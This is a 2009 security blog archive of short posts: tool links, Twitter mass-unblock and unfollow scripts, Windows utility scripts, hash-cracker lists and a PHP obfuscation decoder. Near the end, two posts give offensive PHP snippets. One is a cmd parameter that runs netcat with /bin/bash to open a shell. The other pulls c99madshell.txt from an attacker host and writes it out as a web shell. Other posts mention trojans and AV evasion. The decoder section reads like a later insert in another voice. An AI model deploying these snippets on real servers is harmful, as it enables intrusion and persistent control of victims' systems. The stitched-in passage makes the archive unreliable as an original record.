Sunday, October 4, 2009
Moving Home
Tuesday, September 22, 2009
Security Events and CFP
ggee's Calendar
http://infosecevents.net/calendar/
|)ruid's Google Calendar
http://www.google.com/calendar/embed?src=pe2ikdbe6b841od6e26ato0asc%40group.calendar.google.com
PacketStorm's list of CFPs
http://packetstormsecurity.org/papers/call_for/indexdate.html
Monday, September 21, 2009
Script to unblock people on Twitter – Ruby
I created this script because I couldn’t really find anything out there for it. Both the Twitter support page and all the Twitter APIs out there had the ability to unblock people, but only if you knew who you wanted to unblock. Recently I tried the Twitter Karma service, which can mass unfollow / block people (hence my last couple of scripts). I clicked the wrong button one time and it blocked a whole bunch of people. But say you’re not a klutz like me; maybe you just forgot who you’ve blocked over time.
This script will dump the list of people you block and unblock them all. You could expand this to get the name of each individual that you block, but that’s an API call for each one. Let me know if there is a better way; right now, the only way to figure out who was unblocked is through the 302 response generated by each request, which redirects you to the page of the user you just unblocked. (Push this script through a proxy to see it.)
#!/usr/bin/env ruby
require 'net/http'
require 'rexml/document'
include REXML

# Optional HTTP proxy (e.g. Burp/WebScarab on 8080) so you can watch the 302s
use_proxy = false
proxy_srvr = "127.0.0.1"
proxy_port = "8080"
proxy_user = ""
proxy_pass = ""

twitter_user = "joeuser"
twitter_pass = "password1"

header = {
  'User-Agent' => "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)",
  'X-Requested-With' => "XMLHttpRequest",
  'Cookie' => "__utma="
}
data = "authenticity_token=&twttr=true"
doc = "temp"

# Step 1: pull the XML list of IDs you are currently blocking
if use_proxy == true
  Net::HTTP::Proxy(proxy_srvr, proxy_port, proxy_user, proxy_pass).start('twitter.com') {|http|
    req = Net::HTTP::Get.new('/blocks/blocking/ids.xml')
    req.basic_auth twitter_user, twitter_pass
    response = http.request(req)
    doc = Document.new response.body
  }
else
  Net::HTTP.start('twitter.com') {|http|
    req = Net::HTTP::Get.new('/blocks/blocking/ids.xml')
    req.basic_auth twitter_user, twitter_pass
    response = http.request(req)
    doc = Document.new response.body
  }
end

# Step 2: POST /blocks/destroy/<id> for every <id> element in that list
blocks = doc.elements.each('//id') { |f|
  if use_proxy == true
    Net::HTTP::Proxy(proxy_srvr, proxy_port, proxy_user, proxy_pass).start('twitter.com') {|http|
      req2 = '/blocks/destroy/' + f.text
      response2 = http.post(req2, data, header)
      puts response2.code
    }
  else
    Net::HTTP.start('twitter.com') {|http|
      req2 = '/blocks/destroy/' + f.text
      response2 = http.post(req2, data, header)
      puts response2.code
    }
  end
  puts "Unblocking: " + f.text
}
Script to unfollow people on twitter - Python
This is exactly like the last script with a few minor changes. First, the last script only has the ability to force people to unfollow you if you aren’t following them. Second, the API call and the request URL are different: GetFollowers instead of GetFriends, and friendships/remove instead of friendships/destroy. Don’t forget to fill in the same 4 fields that were missing/wrong in the last one.
#!/usr/bin/python
import twitter
import urllib2

# Fill in the authenticity_token and the __utma cookie from your own session
headers = {
    'User-Agent' : "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)",
    'Cookie' : "__utma=",
}
data = "authenticity_token=&twttr=true"

api = twitter.Api(username='joeuser', password='password1')
for b in range(1,100):
    users = api.GetFollowers(page=b)
    for i in users:
        request = "http://twitter.com/friendships/remove/" + str(i.id)
        req = urllib2.Request(request,data,headers)
        post = urllib2.urlopen(req)
        print post
Script to force people to unfollow you on twitter - Python
I left the authenticity token and Cookie partially filled out so you know what to look for in your request. But basically you fill out those two variables, plus your user / pass of course, and it will go through 100 pages of your followers, which should peg out your API calls. You’ll have to wait another hour to keep going, but you could easily put this in a loop until you got down to 0. The output could use a bit of cleaning up. You’ll need python-twitter, but at least BT4 and Ubuntu have it in their repos for easy install.
#!/usr/bin/python
import twitter
import urllib2

# Fill in the authenticity_token and the __utma cookie from your own session
headers = {
    'User-Agent' : "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)",
    'Cookie' : "__utma=",
}
data = "authenticity_token=&twttr=true"

api = twitter.Api(username='joeuser', password='password1')
for b in range(1,100):
    users = api.GetFriends(page=b)
    for i in users:
        request = "http://twitter.com/friendships/destroy/" + str(i.id)
        req = urllib2.Request(request,data,headers)
        post = urllib2.urlopen(req)
        print post
Saturday, September 19, 2009
Security is Simplicity: Comment by Akibako
akibako <nobody@nowhere.com> (unregistered) wrote:
I wholeheartedly agree with your main point. That said -- and I hate to be the one to split hairs -- I would argue that your Japanese citations are inaccurate.
Japanese people have and use credit cards all the time. According to the Bank for International Settlements, the number of Japanese credit card holders is roughly equal to that of Germany, and even exceeds Canada. It *is* true, however, that Japan does not have 'check cards', but this is simply because Japan does not have checks. The vast majority of cards in Japan work the system of automatically deducting the *entire* balance of the credit card once every month.
Getting a credit card is just as easy as in the States. I got my first Japanese credit card after filling out a half-page form which took less than 5 minutes. No major form of identification was necessary. I get offers for "pre-approved" credit cards in my mail box every month.
Japanese people bank online constantly. Earlier this year, #2-seated cell phone carrier AU launched a partnership with Tokyo Mitsubishi UFJ Bank to access all of your banking functions over your cell phone, including balance transfers. It's been hugely popular, and other carriers have followed suit. The most profitable bank in Japan in 2004 was Shinsei Bank, which differentiates itself by essentially running an online-banking-only presence. Visiting a branch requires you to interface with your account using a PC, not a bank clerk.
Japanese people buy stuff online constantly. Last year, online sales figures per capita in Japan were only slightly below that of America.
In such a disaster-prone country as Japan, it would be short-sighted to assume that the Japanese government doesn't keep easily-backup-able electronic versions of important documents. My family registry, proof of residency, and marriage certificate are all given to me via a laser-printed document (made official by a number of stamps).
Stamps (hanko, inkan) are just as easy to copy -- if not more so -- as written signatures. Life is made infinitely more difficult for the average person as one usually has a number of these stamps in slight variations in design. They are the antithesis of simplicity. There are no records provided telling you which stamp was used for a given document. I've had documents rejected for not having the "correct" inkan, only to have the company later apologize for incorrect verification. The illusion of security is amplified by the perception among people that hanko/inkan are un-forgeable (password analogy, anyone). It is common practice for a business to accept a document from someone other than the document holder simply because it has the correct hanko. There have been numerous news stories of wives emptying their husband's bank accounts and fleeing the country.
The amount of data I push over my lines every month would *easily* be classified as "excessive use" (many times over). While it might be detected by the ISP, disconnections due to it are unheard of.
I agree with, and appreciate, the crux of your argument completely, but do not think that these specific examples from Japanese society are strong fodder.
Thursday, September 17, 2009
Download without touching a site
Blocked from a specific download? On a pentest and don’t want your IP seen pulling a file? Doing malware analysis and don’t want to directly get a file? Here’s the solution:
I’m sure you’ll figure out how to use it that best fits your needs.
Getting 3D video working on Dell Mini 10
Really hard to find (for me at least):
http://credentiality2.blogspot.com/2009/08/accelerated-video-on-dell-mini-10-with.html
This is THE way to get it working right.
FastStone Capture
This tool jaded me for any other screen capturing. I can’t live without it: (The following link is to the freeware version)
http://www.portablefreeware.com/?id=775
It went to trialware after 5.3 so you can download the version 6.5 at:
http://www.faststone.org/FSCaptureDetail.htm
It’s only 19.95 and adds a lot of features including a Screen Recorder.
Both versions are completely portable.
.htaccess tricks
16 cool htaccess uses that help you get a better grip on its use:
http://www.thomsonchemmanoor.com/16-useful-htaccess-tricks-and-hacks-for-web-developers.html
Pentest Console
This was talked about at Security BSides ( by @jcran ), and the video is on the site, but it boils down to a collaboration tool that is super fitted for pentesting.
Monday, September 7, 2009
Offline Microsoft Updates
I’m surprised I haven’t added this my links before:
CTUpdate 6.0 - http://www.h-online.com/security/Offline-Update--/features/112953
The USB stick option in 6.0 is sweet (which you could kinda already do if you knew what directory to copy)
Add this thing to a hacked U3 device to make it silently install updates for Windows / Office products makes a really quick update process.
Saturday, August 29, 2009
@cktricky ‘s DirSnatch
This is one of those tools that doesn’t quite cross your mind until you see its power. DirSnatch is a one-stop executable that you can give a customer of a web app sec test; they run it, and you get back a perfectly formatted text file of all their directories and files for your testing needs.
http://cktricky.blogspot.com/2009/08/source-code-of-dirsnatch.html
Monday, August 24, 2009
Saturday, August 22, 2009
Microsoft Word Auto-Close Prank
http://www.iambetterthanu.com/2007/11/22/microsoft-word-prank/
I wonder what other evil remapping can be done ;-)
Friday, August 21, 2009
Convert VirtualBox VMs to VMware VMs
Source: http://ubuntuforums.org/showthread.php?t=772419
How to convert VBox machine to VMware
I figured it out!! YAY!!
"sudo qemu-img convert /home/emil/.VirtualBox/VDI/WindowsXP.vdi /home/emil/Desktop/XP.vmdk"
I'm not sure if it needs to be executed with "sudo" but that worked for me. Now I can switch to Vmware Virtual Machine from Virtual Box.
Stream your screen via VLC
I’ve seen this before, and I think I’ve done this before, but it’s still awesome and I’m thinking about its use for doing training. Nothing says you can’t do it over the net. Haven’t tried.. yet:
http://www.nerdlogger.com/2008/01/stream-your-linuxwindowsmac-desktop-as.html
Friday, August 14, 2009
Thursday, August 13, 2009
Decoding eval(gzinflate(base64_decode(
Trying to fix it so that my site didn’t say it was sponsored by “Car Dealers”, I ran across an eval(gzinflate(base64_decode( encoded message. Google came up with this 2006 post:
http://danilo.ariadoss.com/decoding-eval-gzinflate-base64-decode/
That didn’t work for me for some reason, but the online one I found later worked like a charm:
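The decoding the post above describes can be done offline with nothing but the Python standard library, which avoids pasting a compromised site's code into a third-party web form. The script below is an added example (not code from the original post or from the linked decoder site): PHP's gzinflate() is raw DEFLATE, so zlib with a negative window size inflates it, and because injected code is frequently wrapped several times the decoder peels layers in a loop until no eval(gzinflate(base64_decode(...))) wrapper remains. The sample payload is constructed in the script from a harmless string; the regex, function names and layer limit are this example's own choices.

```python
#!/usr/bin/env python3
"""Peel eval(gzinflate(base64_decode('...'))) layers off injected PHP.

Added example using only the standard library. The sample payload is
constructed below from a harmless string; in practice you would paste
the encoded blob (or the whole file) from the compromised site.
"""
import base64
import re
import zlib

# One eval(...(base64_decode('...'))) wrapper; captures the base64 blob and
# which PHP inflate function was used. gzuncompress() is accepted too because
# injected code uses both; the group name selects the right decoder.
WRAPPER_RE = re.compile(
    r"""eval\s*\(\s*(?P<func>gzinflate|gzuncompress)\s*\(\s*base64_decode\s*\(\s*
        ['"](?P<blob>[A-Za-z0-9+/=\s]+)['"]\s*\)\s*\)\s*\)\s*;?""",
    re.VERBOSE,
)

def php_gzinflate(data: bytes) -> bytes:
    """PHP gzinflate() = raw DEFLATE (RFC 1951), no zlib header: wbits -15."""
    return zlib.decompress(data, -15)

def php_gzuncompress(data: bytes) -> bytes:
    """PHP gzuncompress() = zlib-wrapped stream (RFC 1950)."""
    return zlib.decompress(data)

DECODERS = {"gzinflate": php_gzinflate, "gzuncompress": php_gzuncompress}

def decode_layers(php_source: str, max_layers: int = 32):
    """Unwrap eval() layers repeatedly; return (decoded_source, layers_removed).

    Stops when no wrapper is left or when max_layers is reached, so a
    malformed or hostile blob cannot keep the loop going forever.
    """
    current = php_source
    for layers in range(max_layers):
        m = WRAPPER_RE.search(current)
        if not m:
            return current, layers
        blob = re.sub(r"\s+", "", m.group("blob"))  # tolerate wrapped base64
        decoded = DECODERS[m.group("func")](base64.b64decode(blob))
        # Replace only the wrapper so legitimate code around it is preserved.
        current = current[:m.start()] + decoded.decode("utf-8", "replace") + current[m.end():]
    return current, max_layers

# --- constructed sample (not from any real compromise) -----------------------
def php_gzdeflate(data: bytes) -> bytes:
    """Mirror of PHP gzdeflate(): raw DEFLATE. Used only to build the sample."""
    c = zlib.compressobj(9, zlib.DEFLATED, -15)
    return c.compress(data) + c.flush()

def wrap(payload: str) -> str:
    """Wrap PHP code the way the injected snippets do."""
    blob = base64.b64encode(php_gzdeflate(payload.encode())).decode("ascii")
    return "eval(gzinflate(base64_decode('%s')));" % blob

INNER = "echo 'Sponsored by Car Dealers';"          # harmless stand-in text
SAMPLE = "<?php " + wrap(wrap(INNER)) + " ?>"      # two nested layers

if __name__ == "__main__":
    text, n = decode_layers(SAMPLE)
    print("layers removed:", n)
    print(text)
```

Run it as-is to see the two constructed layers come off; to analyse a real file, read it into a string and pass it to decode_layers() instead of SAMPLE. The decoded text should be read, never executed.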
Monday, August 3, 2009
RFID Security - Free ID Cards Anyone?
http://www.wired.com/threatlevel/2009/08/fed-rfid/
Blackhat US 2009 (Vegas) Archives
http://blackhat.com/html/bh-usa-09/bh-usa-09-archives.html
UDP Tunneling over SSH
Credit:
Singe tweeted: How to tunnel UDP through SSH, http://is.gd/20fja The socat example worked like a charm for me. A quick hack for when OpenVPN is overkill.
Sunday, August 2, 2009
Rules to reading faster
http://www.fourhourworkweek.com/blog/2009/07/30/speed-reading-and-accelerated-learning/
IPv6 at home
http://yorickdowne.wordpress.com/2008/01/26/ipv6-at-home-part-1-overview-teredo/
List of Freely Available Programming Books
These books are great references:
http://stackoverflow.com/questions/194812/list-of-freely-available-programming-books
Friday, July 31, 2009
Programming from the Ground Up
(Long Version: http://savannah.inetbridge.net/pgubook/)
I have only had a chance to jump through it quickly, but the examples look easy to read and have a bunch of explanation surrounding them. Definitely in my 'to read' pile.
Then @craigbalding countered with: @mubix @windex8er cool...but don't forget the original ASM freebie: http://webster.cs.ucr.edu/AoA/index.html (The Art of Assembly)
This should be enough assembly to fill quite a few weekends.
Monday, July 27, 2009
Thursday, July 23, 2009
Salted Password Cracker / MetaScanner
Kalgecin has two great tools over at his Google code page.
Crack.pl - md5/sha1cracker, works with dictionaries as well as rainbowtables. Or so it says. I haven’t tested yet.
MetaScanner – Kinda like db_autopwn but a lot more customizable.
Internet by all means
Sébastien Raveau posted a great article back in June about all the different ways of getting internet access when that access is restricted. I tweeted about it and talked about it but never put it here, and I always have a hard time re-finding his site (this is my only bookmarking)
http://blog.sebastien.raveau.name/2009/06/internet-by-all-means.html
Definitely check it out if you haven’t already.
Usenet Resource Downloader
Yes.. people still use Usenet. And this is a great way of accessing those pirated movies.. er, in-depth technical discussions.
Source: http://www.ghacks.net/2009/07/23/a-web-interface-for-newsgroups-downloads/
Wednesday, July 22, 2009
WardriveSQL
A database driven wardriving / wep cracking machine.
Original post: http://www.phonelosers.com/index.php?topic=4209.0
“New Site”: http://wardrivesql.info/
Bindshell’s Tools List
Makers of BeEF (Browser Exploitation Framework) have a bunch of other great tools:
http://www.bindshell.net/tools
Echo Mirage is one I have a lot of fun with. And Dnetj is a REALLY useful setup if you can get it going on some beefy boxes.
Metacab
http://www.phx2600.org/archive/2008/08/29/metacab/
Metacab is a cabinet file that contains Netcat, Nmap, VNC and other remote administration utilities that need only a Windows command shell, cmd.exe, to install and use. Install and uninstall scripts are included, and work is being completed on antivirus evasion.
CeWL – Custom Wordlist Generator
By @digininja
http://www.digininja.org/cewl.php
By default, CeWL sticks to just the site you have specified and will go to a depth of 2 links, this behavior can be changed by passing arguments. Be careful if setting a large depth and allowing it to go offsite, you could end up drifting on to a lot of other domains. All words of three characters and over are output to stdout. This length can be increased and the words can be written to a file rather than screen so the app can be automated.
Version 2 of CeWL can also create two new lists, a list of email addresses found in mailto links and a list of author/creator names collected from meta data found in documents on the site. It can currently process documents in Office pre 2007, Office 2007 and PDF formats. This user data can then be used to create the list of usernames to be used in association with the password list.
Reverse Code Engineering Tool Library
The “Collaborative RCE Tool Library” is an awesome list of tools used for RE, but as with all tools, they can be used in a ton of different ways
http://www.woodmann.com/collaborative/tools/index.php/Category:RCE_Tools
Monday, July 20, 2009
Structure of Microsoft PE Files
This is almost as bad as reading the IA32 Assembly manuals, but it’s a must read and it’s really not that long.
Everything you ever wanted to know about PE files:
http://msdn.microsoft.com/en-us/magazine/ms809762.aspx
Thanks cpwp from the Offensive Security forums for the link
Computer Hardware Cheat-Sheet Poster
It costs ($49) to get printed, but you can print it yourself. A great reference for anyone that has ever built a computer.
http://sonic840.deviantart.com/art/Computer-hardware-poster-1-7-111402099
Saturday, July 18, 2009
Polypack – What packer is your friend?
This site checks your binaries against AV, packed and unpacked, then tells you what the best packer, if any would help you avoid AV. But remember, this means you are uploading your binary to a host that you don’t know.
Ncat – Nmap’s new Netcat
Ncat adds many capabilities not found in Hobbit's original nc, including SSL support, proxy connections, IPv6, and connection brokering. The original nc contained a simple port scanner, but we omitted that from Ncat because we have a preferred tool for that function
In-depth Windows Registry
Tim from the PenTest mailing list posted the following references that really delve deep into the Windows hive:
The Windows registry hive format is described here:
http://sentinelchicken.com/research/registry_format/
Also, some of Brendan Dolan-Gavitt's tools and blog (http://moyix.blogspot.com/) posts may be helpful in figuring out what's what in SAM hives.
Friday, July 17, 2009
Buffer Overflow examples
“Insecure Programming by Example” http://community.corest.com/~gera/InsecureProgramming/
These are great tutorials that you can compile and find your zero-days in. (Oh, then send them to a friend, use ServifyThis to make it a service and have your very own vuln.)
Thursday, July 16, 2009
Trojan Key logging Screensaver
Ctrl-Alt-Del will save you ;-)
http://blog.rlr-uk.com/2009/06/trojan-keylogger-screensaver.html
Monday, July 13, 2009
Wednesday, July 8, 2009
Sunday, July 5, 2009
Script Your Documentation Instantly
A great project that allows documentation of network assets locally and over the network ;-) (SYDI). It does a lot that the Meterpreter script ‘winenum’ does, and a whole lot more. Most of it really doesn’t help you as an attacker, but it did spark a lot of good ideas, and sometimes you might not have the power of meterpreter at your beck & call.
sslstrip
Can’t believe I never posted this, it’s Moxie’s sslstrip tool from BH DC 2009. Does some amazing things to help MITM ssl sessions.
WMI interfacing Python Script (nix)
http://dev.zenoss.org/svn/trunk/wmi/
Thanks to Joe McCray of http://www.learnsecurityonline.com/ for the link!
Thursday, July 2, 2009
Validation
If you haven’t seen this video yet, it’s well worth the 16 minutes of your life (yes it is a bit corny):
Handwritten fonts – Presenters this is for you!
One of Garr Reynolds from Presentation Zen’s staples when creating a presentation is to use a unique font. Here is an amazing resource for handwritten fonts, which look GREAT on presentations:
http://www.hongkiat.com/blog/40-free-high-quality-hand-drawn-fonts/
Wednesday, June 24, 2009
PickAXE – Pragmatic Ruby
http://whytheluckystiff.net/ruby/pickaxe/
An awesome online resource for learning Ruby
Windows Heap Overflows using Process Environment Block (PEB)
After a bunch of googling to find out what PEB was I happened upon this old milw0rm paper, which answered that question and the one I was going to ask next: How is it used in exploitation:
System Call Ordinals for XP SP2 x64
http://indefinitestudies.org/2009/01/22/digging-up-system-calls-ordinals-on-xp-x64/
I apologize for not remembering who tweeted this to thank them. But thanks to Daniel Reynaud for posting it.
Tuesday, June 23, 2009
Nessus SCTP scanning
Stolen from: http://blog.tenablesecurity.com/2009/05/scanning-monitoring-for-sctp.html
Paul goes into a lot of meat and potatoes about SCTP but the juice is here:
To scan for SCTP on your network and check if you are vulnerable using Nessus:
Enable “IP Protocols Scan” under the “Misc” plug-in family, and check “Thorough tests(slow)” in the Advanced tab of the scan policy under “Global Variable Settings”.
Monday, June 22, 2009
Dan Guido’s Videos
At the current time of posting, there are 10 videos that, as a security professional, you NEED to watch. It’s free training from some of the best in the biz. Bookmark it.
Fiddler and Watcher
Fiddler is a web debugger, and watcher is a plug-in that adds security testing options to Fiddler.
http://www.fiddler2.com/fiddler2/
Watcher (Fiddler plug-in): http://websecuritytool.codeplex.com/
Thursday, June 18, 2009
“Compile” python to a single executable
Here is a script David Kennedy (ReL1K) sent me a while back when we wrote a trojan for the Cyber Collegiate Defense Competition:
Just download py2exe, python setup.py install, then you have py2exe installed....
Say you have a file moo.py you want to compile. Just take the code below and put it in a file called compile.py or something, modify it to change 'moo.py' to whatever py you want to compile, run python compile.py build py2exe and you're all done. Super simple.
from distutils.core import setup
import py2exe, sys, os
# Hot Sex
sys.argv.append('py2exe')
setup(
options = {'py2exe': {'bundle_files': 1}},
console= [{'script': "moo.py"}],
zipfile = None,
)
Pastebin has evolved.
Etherpad is a pastebin like site where you can edit on the fly… and so can a dozen other people. They actually do a REALLY good job at monitoring changes from everyone. There is also a chat feature, that way you aren’t notepad chatting, and an IMPORT functionality. Importing is great when your clipboard buffer just might not be good enough:
.. just wow.. (Google check them out, they nailed something you are STILL having problems with, but of course, you are still in BETA)
Wednesday, June 17, 2009
Web App Sec Testing Firefox Extension Collection
A really good list of extensions. The best way to do this is keep multiple copies of Portable Firefox with the addons. I would suggest naming the directories for each copy of Firefox accordingly and also editing their configuration to allow simultaneous starting and altering the title bar so that you can differentiate between the multiple instances.
https://addons.mozilla.org/en-US/firefox/collection/webappsec
Tuesday, June 16, 2009
Windows functions to open a socket/connection
I hope to be using these links to use as part of .. you know what… I forgot, but I know it will come back to me and I’ll need these links, so I am storing them here. Muhahahah..
http://msdn.microsoft.com/en-us/library/ms738545(VS.85).aspx
CORE Security IE Zone Bypass MS09-019
CORE’s write-up + code: http://www.coresecurity.com/content/ie-security-zone-bypass
MS09-019 advisory: http://www.microsoft.com/technet/security/Bulletin/MS09-019.mspx
5 Security Holes at the Office (Video)
CSO interviewed Chris Nickerson and he showed a reporter 5 security problems a random office building had before he ever entered the building:
Monday, June 15, 2009
Play Free Online Games - no.. really
Addonics USB 2 NAS
Wednesday, June 10, 2009
Pluses and Minuses of forced SmartCard login
Registry Key:
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\ScForceOption
Off Setting: DWORD=0
On Setting: DWORD=1
This option can make Kon-boot, OFFLINE NT PASSWORD RESET and some of HIREN’s PASSWORD tools pretty useless. But wait.. Can’t you edit the registry offline? Yup! (Be sure to pull the plug because “Computer” policies are applied BEFORE the logon prompt appears)
Tuesday, June 9, 2009
Lists of "Security Tools”
On the Security Focus: Penetration Testing List there was a great set of links to lists of tools:
http://securitytoolslist.domandhost.com/
http://www.security-database.com/toolswatch/
http://www.vulnerabilityassessment.co.uk/Penetration%20Test.html
http://backtrack.offensive-security.com/index.php/Tools
http://www.indianz.ch/ – Haven’t seen this one before. HUGE list of ‘interesting’ files.
And a VOIP specific list: http://www.voipsa.org/Resources/tools.php
Monday, June 8, 2009
ARPFreeze: Protection against ARP spoofing – Iron Geek style
So IronGeek puts out tons of videos and some pretty sweet tools. This one is no less awesome:
http://www.irongeek.com/i.php?page=security/arpfreeze-static-arp-poisoning
Technitium MAC Address Changer
So, yes, it can change your MAC address on your Windows box, but it does A LOT more. Definitely something to pull around with you on a USB stick.
GNS3 Network Simulator
Probably the best way of getting hands on a Cisco without buying one off of eBay. Tons of features and probably the only sim I’ve worked with that has the complete feature set of the actual devices. (Probably because you have to supply it with a real IOS file)
Sunday, June 7, 2009
Crypto for Pentesters
Chris Eng does a good job at explaining what you need to know:
http://video.google.com/videoplay?docid=-5187022592682372937
ISO Standards translated to “Plain English”
I don’t work with ISO standards, but definitely worth keeping the link
And on twitter: http://twitter.com/praxiom
Thursday, June 4, 2009
10 Questions you don’t want to ask in interviews
http://www.sfgate.com/cgi-bin/article.cgi?f=/g/a/2009/04/19/JOBSryan.DTL
- "What does your company do?"
- "Are you going to do a background check?"
- "When will I be eligible for a raise?"
- "Do you have any other jobs available?"
- "How soon can I transfer to another position?"
- "Can you tell me about bus lines to your facility?"
- "Do you have smoking breaks?"
- "Is [my medical condition] covered under your insurance?"
- "Do you do a drug test?"
- "If you hire me, can I wait until [more than three weeks from now] to start the job?"
Sandcat – Advanced Web App Sec Tester
There are tons of scanners/testers on the market, but this one’s feature set kinda caught my eye:
http://pentestit.com/2009/06/04/sandcat-advanced-web-application-security-tester/
As of now, the SandCat will scan for these fault injections:
* Buffer Overflow
* Cookie Manipulation
* Command Execution
* CRLF Injection
* Cross Frame Scripting
* Cross-Site Scripting (XSS)
* Default Account
* Directory Listing
* Directory Traversal
* File Inclusion
* Information Disclosure
* LDAP Injection
* MX Injection
* Password Disclosure
* Path Disclosure
* PHP Code Injection
* Server-Specific Vulnerabilities: IIS / iPlanet / Others
* Source Code Disclosure
* SQL Injection
* XPath Injection
* Miscellaneous
Friday, May 29, 2009
What is a Rootkit? You sure?
A very well written article on some of the history and details of what a “rootkit” is:
http://www.omninerd.com/articles/r00tkit_Analysis_What_Is_A_Rootkit/print_friendly
“Underground Hacking” Links
Here are just some sites that I wanted to get off my open tabs and check out later – standard warning applies, do not inherently trust what you find on these pages:
http://www.darkc0de.com/index.shtml
http://trythis0ne.com/?page=toolz
http://avhackers.com/index.php
http://www.megapanzer.com (Yes you have seen this one before, but in reference to their RAT)
================================
Un.Aware eZine ( http://www.awarenetwork.org/etc/)
Uninformed eZine ( http://uninformed.org/? )
Phrack eZine ( http://phrack.org/ )
Phrack issue #64 by TCOLH - “A brief history of the Underground scene: ( http://phrack.org/issues.html?issue=64&id=4&mode=txt )
Tuesday, May 26, 2009
Force Windows Update Script
Copy and Paste the code below into a text file and name it AUForceUpdate.cmd
=======================================================================
@echo off
Echo This batch file will Force the Update Detection from the AU client:
Echo 1. Stops the Automatic Updates Service (wuauserv)
Echo 2. Deletes the LastWaitTimeout registry key (if it exists)
Echo 3. Deletes the DetectionStartTime registry key (if it exists)
Echo 4. Deletes the NextDetectionTime registry key (if it exists)
Echo 5. Restart the Automatic Updates Service (wuauserv)
Echo 6. Force the detection
Pause
@echo on
net stop wuauserv
REG DELETE "HKLM\Software\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update" /v LastWaitTimeout /f
REG DELETE "HKLM\Software\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update" /v DetectionStartTime /f
Reg Delete "HKLM\Software\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update" /v NextDetectionTime /f
net start wuauserv
wuauclt /detectnow
@echo off
Echo This AU client will now check for the Updates on the Local WSUS Server.
Pause
==================================================================
tail -f, I must leave you for another
tail -f
This tails the log file and the '-f' tells tail to follow the file, so anything new added to the file will also be printed to the screen.
Another option is:
less +F /var/log/messages
The +F option turns on less 'follow mode'. It is similar to tail -f but you will have the benefits of less, like scrolling up and down. To stop tailing, use Ctrl-C and to resume it, press Shift-F.
Durzosploit - Javascript Exploit Generator
http://engineeringforfun.com/wiki/index.php/Durzosploit_Introduction
Sunday, May 24, 2009
Thursday, May 21, 2009
A Cheat, A Method and a Book
Nick Harbour's Reverse Engineering Cheat Sheet:
http://www.rnicrosoft.net/docs/X86_Win32_Reverse_Engineering_Cheat_Sheet.pdf
Lenny Zeltser's Reverse Engineering Cheat Sheet:
http://www.zeltser.com/reverse-malware/reverse-malware-cheat-sheet.html
And the Unix Toolbox. DO NOT underestimate the power of this booklet:
http://cb.vu/unixtoolbox.xhtml
Tuesday, May 19, 2009
Defcon CTF and Qualifiers: Past Challenges and Answers
http://nopsr.us/
100 Free Online Courses (MIT and such)
http://www.computer-colleges.com/blog/2009/diy-ciss-degree-100-open-courses-on-computer-information-systems-and-security/
Tarantula - A fuzzing spider
Their quote:
a big hairy fuzzy spider that crawls your site, wreaking havoc
Haven't tried it yet, plan to.
Handwriting Analysis book on Scribd
Handwriting Analysis & Success Secrets by Bart A Baggett
http://www.scribd.com/doc/2902062/Handwriting-Analysis-Success-Secrets-Bart-A-Baggett
Dranzer - ActiveX Fuzzer
Here is what they say about it:
Attackers frequently take advantage of vulnerabilities in ActiveX controls to compromise systems using Microsoft Internet Explorer. A programming or design flaw in an ActiveX control can allow an attacker to execute arbitrary code by convincing a user to view a specially crafted web page. Since 2000, we have seen a significant increase in vulnerabilities in ActiveX controls.
We have developed Dranzer, a tool that enables users to examine effective techniques for fuzz testing ActiveX controls. By testing a large number of ActiveX controls, we can provide some insight into the current state of ActiveX security. When we discover new vulnerabilities, we practice responsible disclosure principles and perform the necessary remediation steps.
OfficeCat: Look for Exploits in MS Office Documents
Created by Lurene Grenier of the Sourcefire VRT:
http://www.snort.org/vrt/tools/officecat.html
Friday, May 15, 2009
PHP 1-line execute
echo that to a file on a system, or use the previous example to call it, and you can run http://victim.com/whatever.php?cmd=nc -lvp 4040 -e /bin/bash and you'll have a shell waiting for you.
Load txt file as PHP
$shell = "http://attacker.com/c99madshell.txt"; //use something less obvious like readme.txt
$code = file_get_contents($shell);
$fp=fopen("Sh3ll.php","w+");
fwrite($fp, $code);
fclose($fp);
?>
Huge List of Online Crackers
SOURCE:(http://blackhat.ge/?page_id=29)
http://www.milw0rm.com/cracker/
http://www.plain-text.info/add/
http://www.securitystats.com/tools/hashcrack.php
http://www.passcrack.spb.ru/
http://gdataonline.com/seekhash.php
http://www.md5-brute.com/
http://www.md5encryption.com/
http://www.insidepro.com/hashes.php?lang=rus
http://www.cirt.net/cgi-bin/passwd.pl
http://passcracking.ru
http://www.hashchecker.com/?_sls=add_hash
http://www.tydal.nu/category/
http://md5.dustinfineout.com/
http://www.md5-db.com/
http://www.md5hashes.com/
http://sha1search.com/
http://md5.xpzone.de/
http://www.csthis.com/md5/
http://md5.benramsey.com/
http://www.md5this.com/crack-it-/index.php
http://hackerscity.free.fr/
http://ice.breaker.free.fr/
http://md5search.deerme.org/
http://www.md5decrypter.com/
http://securitydb.org/cracker/
http://plain-text.info/index/
http://www.tmto.org/?category=main&page=home
http://md5.geeks.li/
http://hashreverse.com/
http://md5.overclock.ch/biz/index.php?p=md5crack&l=en
http://md5crack.it-helpnet.de/index.php?op=add
https://astalavista.net/index.php?
http://md5search.uk.to/
md5:
http://74.52.200.226/~b4ck/passhash/index.php
http://www.tmto.org/
http://md5.rednoize.com
http://nz.md5.crysm.net
http://us.md5.crysm.net
http://www.xmd5.org
http://gdataonline.com
http://www.hashchecker.com
http://passcracking.ru
http://www.milw0rm.com/md5
http://plain-text.info
http://www.securitystats.com/tools/hashcrack.php
http://www.schwett.com/md5/ - Does Norwegian words too
http://passcrack.spb.ru/
http://shm.pl/md5/
http://www.und0it.com/
http://www.neeao.com/md5/
http://md5.benramsey.com/
http://www.md5decrypt.com/
http://md5.khrone.pl/
http://www.csthis.com/md5/index.php
http://www.md5decrypter.com/
http://www.md5encryption.com/
http://www.md5database.net/
http://md5.xpzone.de/
http://md5.geeks.li/
http://www.hashreverse.com/
http://www.cmd5.com/english.aspx
http://www.md5.altervista.org/
